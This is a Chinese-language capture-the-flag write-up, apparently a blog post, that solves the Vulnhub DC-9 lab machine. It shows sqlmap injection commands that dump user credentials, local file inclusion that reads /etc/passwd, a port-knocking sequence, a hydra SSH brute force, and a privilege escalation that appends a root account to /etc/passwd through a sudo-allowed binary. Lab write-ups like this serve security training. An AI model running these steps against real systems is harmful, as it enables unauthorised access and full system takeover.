天道酬勤

【Vulnhub】DC-9

一、主机发现

使用netdiscover发现主机为192.168.203.135

二、端口扫描

使用Nmap

root@kali:~# nmap -sV -A 192.168.203.135 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:16 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.135
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.135
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.135:80/manage.php
|     Form id: 
|     Form action: manage.php
|     
|     Path: http://192.168.203.135:80/search.php
|     Form id: 
|_    Form action: results.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.38: 
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-10097	6.0	https://vulners.com/cve/CVE-2019-10097
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-0215	6.0	https://vulners.com/cve/CVE-2019-0215
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|_    	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
MAC Address: 00:0C:29:23:B6:C5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.203.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds

目标开放了80端口,22端口显示被过滤掉了,查看web服务:

三、漏洞挖掘

在搜索框中尝试寻找sql注入。

可以看出确实存在注入。(网站应该对注入做了一定的过滤,而且还屏蔽了报错)

利用Sqlmap进行注入:

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" --dbs

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff --tables

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T StaffDetails --columns

看起来好像只是员工的详细信息,查看另一个表:

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users --columns

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users -C UserID,Username,Password --dump

得到admin密码为transorbital1.

四、获取shell

我们拿去登录网站。

这里有一个很有意思的地方,File dose not exist

感觉像是存在本地文件包含:

果然存在本地文件包含。

本来打算还是将一句话写入apache的日志文件进行获取shell,但是靶机的作者,似乎将日志文件给换位置了。

于是借鉴了大佬的思路:https://blog.csdn.net/adminuil/article/details/104055711

/etc/knockd.conf

knockd是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中。

原文看这里:https://www.sohu.com/a/239577838_185201

可以看到目标果然做了手脚,这也是为什么我们探测的22端口显示是被过虑了。

现在我们需要依次访问7469、8475、9842三个端口,ssh端口就会开放.

现在我们即可看到22端口被打开了。

现在只有admin的账户,但是从刚才文件包含出来的/etc/passwd中来看貌似没有admin的账户,所以思路不是admin,感觉更像是那些用户,于是我又重新将数据库注入了一次:

sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D users -T UserDetails --dump

得到:

Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

接下来利用得到的账号和密码进行爆破,使用工具hydra

root@kali:~# hydra -L username.txt -P password.txt 192.168.203.135 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-17 17:18:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 306 login tries (l:17/p:18), ~20 tries per task
[DATA] attacking ssh://192.168.203.135:22/
[22][ssh] host: 192.168.203.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.203.135   login: janitor   password: Ilovepeepee
[22][ssh] host: 192.168.203.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-17 17:19:52

我们得到了三对账号密码。依次登录切换密码,最终在用户janitor的目录下找到了隐藏文件

像是其他用户的密码,我们将这些密码再进行一次爆破。

[22][ssh] host: 192.168.203.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.203.135   login: joeyt   password: Passw0rd

五、提权

登录用户fredf

发现可以无需root密码执行/opt/devstuff/dist/test/test

test为可执行文件,我们翻一下目录,看看是否能找到什么其他的线索。

发现了他的源码,看了看用法,大体上可以理解为:

读取第一个参数的内容,然后将参数一的内容写入到参数二的内容中。

于是,我们可以创建一个用户密码,写入到/etc/passwd

perl -le 'print crypt("hackergu","salt")',生成加盐的密码。

创建一个用户:

echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd

写入/etc/passwd

fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password: 
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】DC-9
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏